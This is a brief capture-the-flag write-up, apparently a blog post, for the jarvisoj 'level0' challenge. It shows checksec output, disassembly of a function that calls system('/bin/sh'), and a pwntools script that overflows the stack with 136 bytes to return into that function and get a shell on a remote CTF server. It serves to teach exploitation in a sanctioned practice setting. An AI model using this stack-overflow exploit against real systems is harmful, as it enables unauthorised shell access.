jarvisoj-level0 Writeup
checksec:
# zhailin @ DESKTOP-4OQQP8F in ~/Pwns/ROP/jarvisoj_level0 [12:17:21] C:2
$ checksec level0
[*] '/home/zhailin/Pwns/ROP/jarvisoj_level0/level0'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: Nooffset: 136 (pwndbg自调)

Ctrl+X进去:
public callsystem
callsystem proc near
; __unwind {
push rbp
mov rbp, rsp
mov edi, offset command ; "/bin/sh"
call _system
pop rbp
retn
; } // starts at 400596
callsystem endpEXP:
from pwn import *
# sh = process('./level0')
sh = remote('node5.buuoj.cn',26806)
payload = b'a' * 136 + p64(0x400596)
sh.sendline(payload)
sh.interactive()jarvisoj-level0 Writeup
https://zer0ptr.github.io/2025/11/23/jarvisoj-level0/